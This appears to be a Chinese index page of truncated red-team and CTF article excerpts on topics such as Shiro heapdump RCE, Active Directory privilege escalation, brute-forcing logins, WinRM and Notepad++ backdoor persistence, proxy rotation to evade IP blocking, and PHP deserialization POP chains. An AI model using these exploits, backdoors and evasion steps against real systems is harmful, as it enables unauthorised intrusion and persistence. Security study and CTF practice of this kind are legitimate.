红队攻击面相关讨论

0x00 前言 关于众测、专属中如何去捡漏xss洞，水文，水文，水文！！！0x01 日常测试日常无聊测站点，当你在渗透测试时候，发现有某个html标签调用服务器内图片的，并且是那种加入服务器ip地址的，可以尝试通过修改host头来fuzz一下，探测下是否存在xss。 看到这种情况我们可以大概猜想一下，其中的后段代码可能是以下样子：<img src="<?php echo "http://{$_SERVER['HTTP_HOST']}/"?>xxx/aaa.png" />这样看来就很简单了，修改一下请求包中的host就能造成xss咯。 成功弹窗 捡破烂小tips完结。 转自原来链接：https://blog.csdn.net/Guapichen/article/details/124040935?spm=1001.2014.3001.5501

1. 简介我搭建了一个Spring heapdump泄露shiro key从而RCE的漏洞环境，Github地址：https://github.com/P4r4d1se/heapdump_shiro_vuln 漏洞利用条件： Spring Shiro环境存在heapdump文件泄露存在可利用链2. 漏洞原理Shiro相关的漏洞原理和调试分析已经有很多大佬分享过了，这里不再赘述，这里主要针对这个漏洞环境进行说明： （1）Spring其实是有自己默认安全框架的，叫Spring Security，但可能有的开发用Shiro用习惯了，将Spring Securiy替换成了Shiro，这种情况并不少见，比如若依就是Spring shiro。 （2）在有key的情况下，即使是最新版的Shiro也一样存在漏洞，而且在很多时候都会因为开发、部署等问题导致shiro key的泄露。 （3）Shiro大于1.2.4的版本中，在没有开发人员人工干预的情况下key改为了随机生成，这个随机生成是在每次启动Web环境的时候，重启前这个key不会改变，可以在JVM虚拟机内存里找到。 （4）Spring的heapdump文件就是从JVM虚拟机内存导出的。 综上所述导致了这个组合漏洞的产生。 3. 漏洞演示加载漏洞环境后，可以看到Shiro版本为1.8.0： 访问8080端口的/actuator/heapdump获取heapdump文件： 获取其中的shiro key，我常用的有两种方式： （1）JDumpSpider：https://github.com/w…

babyphp index.php: <?php //something in flag.php class A { public $a; public $b; public function __wakeup() { $this->a = "babyhacker"; } public function __invoke() { if (isset($this->a) && $this->a == md5($this->a)) { $this->b->uwant(); } } } class B { public $a; public $b; public $k; function __destruct() { $this->b = $this->k; die($this->a); } } class C { public $a; public $c; public function __toString() { $cc = $this->c; return $cc(); } public function uwant() { if ($t…

1.MS14-068 kerberos认证，no PAC 用户在向 Kerberos 密钥分发中心（KDC）申请TGT（由票据授权服务产生的身份凭证）时，可以伪造自己的 Kerberos 票据 漏洞效果： 将任意域用户提升到域管权限 利用条件： 1.小于2012R2的域控 没有打MS14-068的补丁(KB3011780) 2.拿下一台加入域的计算机 3.有这台域内计算机的域用户密码和Sid 利用方式： 在《Kerberos认证及过程中产生的攻击》一文中有详细讲 这可以看 https://cloud.tencent.com/developer/article/1760132 2.CVE-2020-1472 NetLogon特权提升漏洞(CVE-2020-1472)是一个windows域控中严重的远程权限提升漏洞。 Netlogon使用的AES认证算法中的vi向量默认为0，导致攻击者可以绕过认证，同时其设置域控密码的远程接口也使用了该函数，导致 以将域控机器用户的password设置为空。 这样我们就可以导域管hash，最后再还原域控机器用户的密码 漏洞效果： 可利用此漏洞获取域管访问权限 影响版本： 利用方式： https://cloud.tencent.com/developer/article/1780108 https://cloud.tencent.com/developer/article/1837483 3.CVE-2021-42287&42278 Windows域服务权限提升漏洞（CVE-2021-42287, CV…

在渗透测试过程中，碰见的web登录页面特别多，那么我们应该用什么样的思路去进行一个测试呢，下面看看我的一些测试师思路ba 测试思路 当看见一个这样的web登录框时，会怎么样进行一个渗透呢 弱口令 我们可以看见 这个登录时并没有存在一个验证码，就会存在一个爆破问题 那么一般爆破的用户名又会存在那些呢 1.admin 2.test 3.root 这里也可以去查找对应系统的的操作手测，收集管理账号，增加爆破机率 在这里进行了爆破，并没有结果 目录扫描 我们可以去扫描目录 可能一些被扫描出来的目录未做鉴权 可直接访问 JS文件未授权 上面方法都无果后，我们接下来去看下JS文件 发现在index.js中存在一个/SystemMng/Index的url 我们尝试拼接访问 拼接进来后 发现什么都没有 是不是准备放弃了 别急 我们再看看JS 是不是发现惊喜了 拼接几个危害都挺大的 拿个可以继续利用的给大家 组合拳弱口令爆破 到这里我们拿到了管理员的账号以及电话了，也可以直接重置他们密码了（拿正确的账号再去尝试爆破） 可以看见 password被加密了 发现为m5 我们利用burp自带的转码爆破即可 爆破成功 账号比较复杂 在没前面的操作下拿不到用户名 登录成功 登录返回包测试 随意输入登录的账号密码登录抓包 修改他的鉴权数据后 修改后发现跳转的还无数据 JS中还是存在泄露 利用方法一样 越权 现在已经拿到了普通用户的账号密码了，那我们后面应该去尝试一个越权 垂直越权 或者 平行越权 拿爆破…

0x01 漏洞简介 Dolibarr ERP & CRM <=15.0.3 is vulnerable to Eval injection. By default, any administrator can be added to the installation page of dolibarr, and if successfully added, malicious code can be inserted into the database and then execute it by eval. CVE编号：CVE-2022-2633 漏洞描述：Dolibarr edit.php 存在远程命令执行漏洞，攻击者通过逻辑漏洞创建管理员后可以通过后台漏洞获取服务器权限 影响版本：<= 15.0.3 0x02 漏洞分析 1.环境搭建 源码下载地址：https://github.com/Dolibarr/dolibarr/archive/refs/tags/15.0.3.zip 解压到web目录下直接访问~/htdocs/即可 然后配置一下conf/conf.php即可进行安装 2.任意管理员用户注册 这其实算是个逻辑漏洞，在install系统以后，他不会进行锁定，而是需要用户在documents目录中手动添加，所以我们随时可以进入这里去添加管理员账号：~/install/step4.php 比如这里我添加一个aaa用户 可以成功进入后台的 3.后台RCE 后台RCE的最后点在ht…

利用Python脚本自动生成Clash配置文件，实现FUZZ自动切换IP。现在蓝狗封IP速度太快了，想想当年自己用Burp爆破封堵IP的日子就想哭。 不要问我为啥不用飞鱼，太贵了。0x00 购买IP地址池推荐余额套餐的方式进行购买，该脚本配合余额支付更划算。 http://http.py.cn/pay/?paytype=banlance 0x01 获取API接口购买套餐后，选择》API提取》直接提取，推荐配置如下： 1.余额提取。2.使用时长按需选择，建议选择25分钟-180分钟。3.提取数量建议为5-10，土豪随意。4.建议省份混拨，并选择自己所在省份或临近省份，提高访问速度。5.目前该代理协议仅支持SOKCS5连接。6.数据格式选择Json格式，方便脚本解析。7.选择属性全部勾选，否则会发生错误。8.IP去重365天。 0x02 部署说明将Auto_proxy代码（Auto_proxy_example.yaml, Auto_proxy.py, proxyIgnoreList.plist ）拷贝到Clash配置文件目录下。 Windows默认：Clash\Data\profiles\Mac默认：~/.config/clash/ 修改Auto_proxy.py相关配置，主要参数如下。 test_url：需要监控测试的IP地址。py_api：上一步获取的品易API接口。max_connect_error：错误连接次数，连续连接错误N次，重新获取代理。 白名单配置，可参考https://www.cnblogs.com/PowerTips/…

0x00 前言本项目主要针对pc客户端（cs架构）渗透测试，结合自身测试经验和网络资料形成checklist，如有任何问题，欢迎联系，期待大家贡献更多的技巧和案例。 0x01 概述PC客户端，有丰富功能的GUI，C-S架构。 0x02 开发语言C#(.NET)，JAVA，DELPHI，C，C++...... 0x03 协议 TCP、HTTP(S)，TDS...... 0x04 数据库 oracle，mssql，db2...... 0x05 测试工具 //相关工具下载：https://github.com/theLSA/hack-cs-tools dvta： pc客户端靶场 ida pro： 静态分析工具 ollydbg：动态分析工具 CFF Explorer：PE文件分析 PEID：查壳工具 exeinfope/studype：pe文件分析 wireshark：观察流量 tcpview：观察tcp流量 echo Mirage：可拦截tcp流量 burpsuite：http(s)抓包 proxifier：全局代理流量 procmon：文件和注册表监控 regshot：注册表变化对比 process Hacker：进程分析 RegfromApp：注册表监控 WSExplorer：岁月联盟进程抓包工具 strings：查看程序的字符串 .net[反]编译： dotpeek de4dot dnspy ilspy sae ildasm ilasm Java反编译 jad jd-gui jadx dex2jar 在线版： javare.cn…

re-babyre1、下载得到chall.txt，使用file命令查看文件类型，该文件是python文件 2.这里将chall.txt重命名为chall.pyc 使用在线python反编译得到python(https://tool.lu/pyc) from ctypes import c_uint32 from base64 import b64encode def enc(rounds: int, v: list, key: list): magic = 3735928559 l, r = c_uint32(v[0]), c_uint32(v[1]) total = c_uint32(0) for _ in range(rounds): l.value -= (r.value << 4) - (r.value >> 6) + (key[(total.value & 3)] << 2) ^ key[(r.value << 3 & 3)] total.value -= magic r.value += ((l.value << 5) + (l.value << 4) ^ key[(total.value & 3)] >> 2) + key[(l.value & 3)] else: return ( l.…

0x01 web1.ezjava下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞 util ,最后好像没用到 检查程序，发现apache的common−collections4,而且其反序列化利用类未被Patch 一眼看到 commons-collection4-4.0, 于是直接用 ysoserial 打 考点发现就是 cc4 附上文章 外加spring−ech 网上有现成的 poc 造轮子！ : package moe.orangemc; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import javassist.ClassPool; import javassist.CtClass; import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections4.functors.ChainedTransformer; import org.apache.commons.collections4.functors.…

外网进内网通常就是通过web漏洞拿取shell 内网的很大一部分信息收集是围绕网络拓扑图展开的。可以社工运维或者google找一下。 内网扩散信息收集概述 内网信息收集内网网端信息：对内网进行拓扑、分区内网大小内网核心业务信息oa系统、邮件服务器、监控系统....其他Windows、linux主机信息收集内网信息收集做的越好，打的越快 常用方法主动扫描。常用工具: nmap,netdiscover,nc,masscan,自写脚本等常用端口和服务探测内网拓扑架构分析。如dmz,测试网等命令收集本机信息 一般都是先扫80端口等。因为外网网站可能做的很好，内网网站烂的爆，sql注入、xss等web漏洞一把一把的。 主动扫描ping命令扫描内网中的存活主机优点:方便，一般不会引起流量检测设备的报警缺点：扫描速度慢，目标开了防火墙会导致结果不准nmap扫描存活主机(icmp扫描)nmap -sn -PE -n -v -oN 1.txt 目标ip参数： -sn 不进行端口扫描;-PE 进行icmp echo扫描;-n 不进行反向解析;-v 输出调试信息;-oN输出nmap 扫描存活主机(arp扫描)nmap -sn -PR -n -v 目标IP参数：-PR代表arp扫描，在内网中arp扫描速度最快且准确率高使用netdiscover扫描(arp扫描工具，既可以主动扫描也可以被动嗅探)netdiscover -i eth0 -r 目标IP参数说明:-i:指定一个接口;-r∶指定扫描范围注意: netdiscover时间越久越精确，可以发现某一台主机在一…

EasyPOP题目环境是 php 7.4, 图省事直接把所有属性的类型都改成 public 起点是 sorry 类的 __destruct(), 由 echo $this->hint 调用到 show 类的 __toString() 方法, 然后通过执行 $this->ctf->show() 跳转 secret_code 类的 __call() , 进而到 show() 方法, 在 show() 方法中访问不存在的属性, 跳转到 sorry 类的 __get(), 最后通过 $name() 跳到 fine 类的 __invoke() pop 链构造如下 <?php class fine { public $cmd; public $content; } class show { public $ctf; public $time; } class sorry { public $name; public $password; public $hint; public $key; } class secret_code { public $code; } $e = new fine(); $e->cmd = 'system'; $e->content = 'cat /flag'; $d = new sorry(); $d->key = $e; $c = new secret_code(); $c->code…

0x00 写个开头凑字数这次攻防打的还是比较有意思的，开局电脑摆烂恼火的很，最后没电脑只能拿着销售的电脑疯狂输出。 去拿电脑没一会的功夫我们的私有目标就被干出局了，这次的规则还是有点问题按系统分给各个队伍，不是按照目标单位分的，别人分到我们私有目标的部分系统基础分和数据分薅完一下被干出局了，后面再打只有100路径分，还有老6盯着我们的私有目标打，有个泛微office的洞我们手上没有，目标一放出来就穿了，怪自己太菜了。 排名最后还算理想吧最终排名第三，跟两个技术大哥没后端支撑的情况排到前三还是可以的，前面两位重量级选手卷不过啊，一个提交0day另外一个后端支撑有名的卷，最后前两名分数比我们高出一半多。 废话讲完了，开始我们的内容，码打的严师傅们勿怪，文章最后欢迎师傅们留下评论来交流。 0x01 目标某医院外网弱口令第一天分了私有目标和公共目标，这个目标是公共池目标，运气也是比较好外网一个弱口令直接进去了，主要就是要知道IP地址，突破到内网这里没啥技术含量，目标给的是一个官网的地址，估计其他队伍的师傅们都去冲云上官网那个IP了，后面云上的我们也通过信息科专用共享服务器上密码文件拿到了所有权限。 攻击路径 下面我会按照上面图上标记的序号说明内网攻击过程 路径1/路径2 外网弱口令这里说下这个目标IP怎么来的，通过IP地址收集C段信息找到h3c设备，默认审计账号密码登陆上去命令控制台查看对应授权信息确定是目标IP地址，但是审计账号没有配置权限没法做vpn隧道这些，所以做了个全端口扫描发现一个非标准端口的ssh弱口令，这里拿到服务器权限后我先做了…

0x00 前言2022.8.X单位突然通知参与某行业专项攻防演练，本着学习的目的参与了一波，特此记录。 0x01 打点获得目标单位名称 先通过爱企查、天眼查等工具查询目标及目标下属单位信息 可以利用工具：ENEScan_GO 接着就是信息收集三板斧 子域名、IP、端口 收集子域名：OneForAll（API要配置全一点）、Subfinder、FOFA、Hunter 收集IP：Eeyes、domain2ip 端口扫描：Goby、Nmap、Masscan 这里使用的是Goby全端口扫描，扫描速度堪忧，但优点是比较全面且展示效果较好。 端口扫描后筛出Web类与非Web类端口，便于精确打击。 Web类可以先统一进行指纹识别，优先攻击一些重点的框架系统 比如（Shiro、通达OA、用友NC等） 非web类可以筛出来进行服务爆破，一些特殊的端口可以优先摸一下试试，比如6379 Redis 0x02 获取突破口一番操作之后，通过以上打点，得到了一个Shiro框架的系统，这个系统是访问路径后默认跳转到SSO平台进行登录的。想进入该系统，入口必须是走SSO平台登录验证后进入。但是经过手工口令测试，发现通过弱口令进SSO系统有点困难，战略性放弃。 先利用Shiro反序列化工具查看是否存在RCE漏洞。 这边给个建议，不同工具可能不一定能抛出Key和利用链，大家在进行测试的时候，手里尽量多换几个工具来测试，我这里换了三个工具才跑出Key和利用链，其他的工具就是跑不出（不是Key字典的问题，就是单纯跑不出。。。） Linux机子，whoami Root权限，…

WinRM实现端口复用这种攻击方式前提是需要帐号和密码，如果在获得hash的情况下也可以利用evil-winrm来实现hash登录 服务介绍WinRM全称是Windows Remote Management，是微软服务器硬件管理功能的一部分，能够对本地或远程的服务器进行管理。WinRM服务能够让管理员远程登录Windows操作系统，获得一个类似Telnet的交互式命令行shell，而底层通讯协议使用的是HTTP。 后门应用在windows2012服务器中，winrm默认启动，开启了5985端口，在2008系统中需要手动开启服务 winrm quickconfig -q启动后防火墙也会放行该端口 设置启用httplistener监听并存 winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} //80 winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"} //443 修改监听端口为80/443 winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"} winrm set winrm/config/Listener?Address=*+Transport=HTTPS　 @{Port="443"} 本地连接也需要开启WinRM服务，然后设置信任连接的主机， winrm quickc…

0x01 外网打点资产发现多测绘平台搜索 https://hunter.qianxin.com/ https://fofa.info/ https://quake.360.cn/ 多语法搜索 假如某个目标站点为xxxx.com ，我们可以通过不同的语法进行资产搜集，搜集的资产会更全面 这里以fofa为例 domain="xxxx.com" host="xxxx.com" header="xxxx.com" cert="xxxx.com" 敏感信息泄露对于学校站点的信息搜集，一般来说外网能拿直接权限的点已经很少了，web应用大多是放在vpn后面，因此能弄到一个vpn账号可以说是事半功倍，这时候可以通过语法对此类信息进行挖掘 常用命令如下： #google语法 site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码 #github *.edu.cn password 在这次攻防演练里，也是幸运找到了某站点VPN的默认口令，使用的是 姓名拼音/12345678 弱口令 默认口令对于部分站点，在搭建完成后可能没有更改默认账号密码，这时候可以尝试使用默认账密登录 下面列举一些常见的web站点默认口令 账号： admin administrator root user test 密码： admin admin123 123456 123 test root 对于一些应用广泛的系统，可以通过google语法搜索其默认密码 这里通过sysadmin/1 成…

本文仅对影视剧中涉及的技术进行分析，对剧情不做详细的说明。感兴趣的童鞋可以去看看。PS: 技术分析按照剧情顺序进行（1~4）集前言电视开头，便给我展示了第一种攻击技术，恶意充电宝。看似利用充电宝给手机充电，但是在充电的过程中，便已经获取了用户的信息。 实现原理 这种方法，在我前面的文章中有所涉及《利用树莓派监控女盆友手机》，其实很简单，就是利用adb命令获取手机的信息，当然也可以利用adb命令安装shell。 实现难度 容易，只需要开启手机开发者先选即可。 但是在现实中，手机开发者选项是默认关闭的。像电视中的情形是不会实现的。 信息收集基于朋友圈收集信息 通过对朋友圈非朋友可见十条 查看最近朋友圈的动态，获取对方的相关的信息。再加上推测，得知女主老公出轨的可能性。表哥建议 非工作需要，还是尽量在微信中，将此功能关闭吧。 基于微信步数的信息收集 通过微信步数，可以获取当前在干嘛？如早上八点你刚睡醒，好友的步数已达到5000步，说明他很有可能在跑步锻炼身体。基于钓鱼链接的信息收集 在表哥前面的文章中，也写过类似的文章。通过探针可以简单的获取目标的IP地址，GPS信息，以及照片，录音等等。但是随着手机安全性能的提高，都会有弹窗提示。利用百度网盘备份数据 这个在生活中，常常遇到。而且在安装百度网盘后，备份通讯录等信息是默认开启的。可以一试！（最好将头像也换掉，这样才真实）利用滴滴分享行程 通过以上方案，主人公成功得到了对方的手机号码，并通过微信查找到了相关的账号。当然网安专家的电脑中毒了。 对驱动盘符的破解 这里当然是导演给了…

攻击技战法 [list] 云上攻击技战法 https://hackingthe.cloud/[doc] 红队技术实战 https://ired.team/威胁情报 Threat Intelligence[list] https://github.com/hslatman/awesome-threat-intelligence红队框架/工具集 Redteam Framework[tool] Utilities for MITRE™ ATT&CK https://github.com/nshalabi/ATTACK-Tools[tool] 好用的渗透工具列表 https://github.com/enaqx/awesome-pentest[book] KALI渗透 https://jobrest.gitbooks.io/kali-linux-cn/content/[paper] ATT&CK 发布了七款安全产品的评估 https://medium.com/mitre-attack/first-round-of-mitre-att-ck-evaluations-released-15db64ea970d[doc] 红队技术实战 https://ired.team/[tool] 红队框架 https://ired.team/offensive-security/red-team-infrastructure/automating-red-team-infrastructure-with-terraform[cheatsheet] …

一、WEB1.web_BaliYun进去之后一个文件上传，而且只能上传图片。访问www.zip拿到源码 网站源码：index.php:<?php include("class.php"); if(isset($_GET['img_name'])){ $down = new check_img(); # here echo $down->img_check(); } if(isset($_FILES["file"]["name"])){ $up = new upload(); echo $up->start(); } ?> class.php:<?php class upload{ public $filename; public $ext; public $size; public $Valid_ext; public function __construct(){ $this->filename = $_FILES["file"]["name"]; $this->ext = end(explode(".", $_FILES["file"]["name"])); $this->size = $_FILES["file"]["size"] / 1024; $this->Valid_ext = array("gif", "jpeg", "jpg", "p…

一、misc 1.题目名称：CyberSpace先选择最小的数使其相等，然后分成两部分依次加各部分最小的次数，不会写脚本只能手搓b= [32 , 38, 27 , 33 , 53 , 30 , 35 , 32 ,32 , 31 , 44 , 31 , 40 , 46 , 25 , 50 , 41 , 44 , 55] flag='' for i in range(len(b)): flag+=chr(b[i]+70) print(flag) #flag{different_xor} crypto strange_rsa1 将 n 也变成小数的形式， n/gift 就约等于 q**2，然后开方在附近搜索 q，之后解 RSA 即可 2.题目名称：ezdct-svd开局一张图 根据题目名ezdct-svd就可以知道是dct的频域隐写，然后hint.txt为 我们找到了用于嵌入水印的脚本文件hide.py中其中的三行（这三行并不挨着）： watermark = cv2.imread('qrcode.bmp', cv2.IMREAD_GRAYSCALE).flatten() > 128 block_shape = (8, 8) Sigma[0] = (Sigma[0] // 30 + 0.5 * watermark[i] + 0.25) * 30 最后那句可以在invisible-watermark/dwtDctSvd.py at main · ShieldMnt/invisible-watermark (github.com)这找到相…

0x01 JWT基础知识1.JWT简介JWT全称为JSON Web Token,将json对象作为载体来传输信息。通常用于身份认证和信息交换。JWT 可以使用密钥（HMAC 算法）或使用 RSA 或 ECDSA 的公钥/私钥对自身进行签名2.JWT格式每当用户访问站点中的资源时，对应的请求头认证默认为Authorization: jwt，JTW令牌认证以eyJ开头JWT的数据头部如下：JWT的数据分为三部分：头部（Header），有效载荷（Payload），签名（Signature）三个部分以英文句号.隔开,JWT的内容以Base64URL进行了编码下面就是一个具体token的例子： eyJraWQiOiJrZXlzLzNjM2MyZWExYzNmMTEzZjY0OWRjOTM4OWRkNzFiODUxIiwidHlwIjoiSldUIiwiYWxnIjoiUlMyNTYifQ.eyJzdWIiOiJkdWJoZTEyMyJ9.XicP4pq_WIF2bAVtPmAlWIvAUad_eeBhDOQe2MXwHrE8a7930LlfQq1lFqBs0wLMhht6Z9BQXBRos9jvQ7eumEUFWFYKRZfu9POTOEE79wxNwTxGdHc5VidvrwiytkRMtGKIyhbv68duFPI68Qnzh0z0M7t5LkEDvNivfOrxdxwb7IQsAuenKzF67Z6UArbZE8odNZAA9IYaWHeh1b4OUG0OPM3saXYSG-Q1R5X_5nlWogHHYwy2kD9v4nk1BaQ5kHJI…

1.Web 1-1:题目名称：目录扫描 Flag: DASCTF{84a70245035ca88088a2ba6ae2378021} 1-3:题目名称：MissingData 主要就是开头ob_start();所以所有输出都会存到缓冲区，用户手动取输出 所以文件名$this->LOG_NAME由hello获得： $hello = $_GET['hello']; echo $hello; $this->LOG_NAME = base64_decode(ob_get_contents());//就把hello传过来的值存到LOG_NAME了 ob_clean(); 文件内容就是REMOTE_ADDR连接UA： $getlog->setIp($_SERVER['REMOTE_ADDR']); $getlog->setUserAgent($_SERVER['HTTP_USER_AGENT']); $getlog->echoLog(); $log_info = date("Y-m-d H:i:s ").ob_get_contents(); 最末尾析构函数会写日志 public $LOG_PATH = "/log/"; file_put_contents(dirname(__FILE__).$this->LOG_PATH.$this->LOG_NAME,$log_info); //路径也就是./log/$_GET['hello'] …

0x00 前言机器帐户被许多技术用于权限提升和横向移动，但也有通过机器帐户建立域权限持久性的情况。这涉及将任意机器帐户添加到特权组（例如域管理员组）或修改机器帐户的 userAccountControl 属性中，使其转换为域控制器。在这两种情况下，攻击者都可以通过机器帐户进行身份验证并执行特权操作，例如通过 DCSync 导出所有域哈希等。 @Sean Metcalf 是第一个公开披露如何通过将机器帐户添加到高权限组来将机器帐户用作域持久性后门的人，此方法与向域管理员组添加标准用户帐户相同。2020 年， @Stealthbits 发布了一篇名为《SERVER (UN)TRUST ACCOUNT》的文章，展示了另一种持久性技术，其中涉及如何从机器帐户进行 Active Directory 复制。尽管通过 DCSync 技术转储密码哈希并不新鲜，并且相关操作可能会触发适当的警报，但使用机器帐户执行相同的技术能够达到更隐蔽的目的。 0x01 userAccountControl基础知识在活动目录中，userAccountControl 是每一个账户的必备属性，该属性是一个位字段，不同的标志位代表不同的用户信息，该属性的值为所有标志位值的和。 下图是微软官方文档中给出的可能标志位，以及其十六进制和十进制值，详情请参考：Use the UserAccountControl flags to manipulate user account properties。 userAccountControl 中有一个名为 SERVER_TRUST_…

0x00 前言 Notepad++是一个流行的 Windows 文本编辑器，它具有插件方式的扩展功能。 在 Windows 环境中，尤其是在开发人员和IT 人员的主机中安装了 Notepad++ 文本编辑器的情况并不少见。除了可以为红队人员提供重要信息的收集之外，还可以通过将从远程命令执行加载或脚本的任意插件来用作权限维持。 0x01 基本消息框示例 Notepad++ 插件可用于扩展 Notepad++ 的功能。默认情况下，用户可以在 Notepad++ 已信任的插件列表中安装所需插件，但也可以运行安装自定义插件，无需任何验证，从而为开发人员提供可扩展文本编辑器使用的灵活性。插件具有 DLL 文件的形式，要安装自定义插件，只需将 DLL 放入%PROGRAMFILES%\Notepad++\plugins\pluginName\pluginName.dll. 好处是加载或激活插件不需要用户交互。缺点是需要本地管理员权限才能写入目录。 应该注意的是，为了加载插件，文件夹名和 DLL文件名需要相同。对于红队人员来说，不需要从头开始编写恶意插件，因为Notepad++ 插件包可以用作修改模板。当特定事件发生时，有多种 API 可用于执行任意操作。当在 notepad++ 中输入字符时， SCI_ADDTEXT API 将触发自定义命令。在以下示例中，当插入字符时将会弹出一个消息框。 可以在https://github.com/kbilsted/NotepadPlusPlusPluginPack.Net/blob/mas…

MISC 签到题 八道网络安全选择题，百度都能搜索到答案，这里如果只知道部分题目答案，可以通过枚举测试fuzz答案，获得flag flag: flag{a236b34b-8040-4ea5-9e1c-97169aa3f43a} RE re693 直接下载附件用golang打开 看main函数可以发现会打印两句话，要求输入有六个参数并且第三个为gLIhR 的函数、被调用三次并且会调用到cHZv5op8rOmlAkb6的函数 Input the first function, which has 6 parameters and the third named gLIhR: 输入第一个函数，它有 6 个参数，第三个名为 gLIhR： Input the second function, which has 3 callers and invokes the function named cHZv5op8rOmlAkb6: 输入第二个函数，它有 3 个调用者并调用名为 cHZv5op8rOmlAkb6 的函数： 直接全局搜索，第一个函数为，ZlXDJkH3OZN4Mayd，有6个参数 第二个函数可以先全局搜索cHZv5op8rOmlAkb6 看哪个函数会调用到这个函数，然后再进一步搜索看看符不符合题意，相对应函数为UhnCm82SDGE0zLYO 有6个，出去自己，还有之后那个2个重复判断，则有3个调用 然后就是看主函数 func main() { var nFAzj, CuSkl string …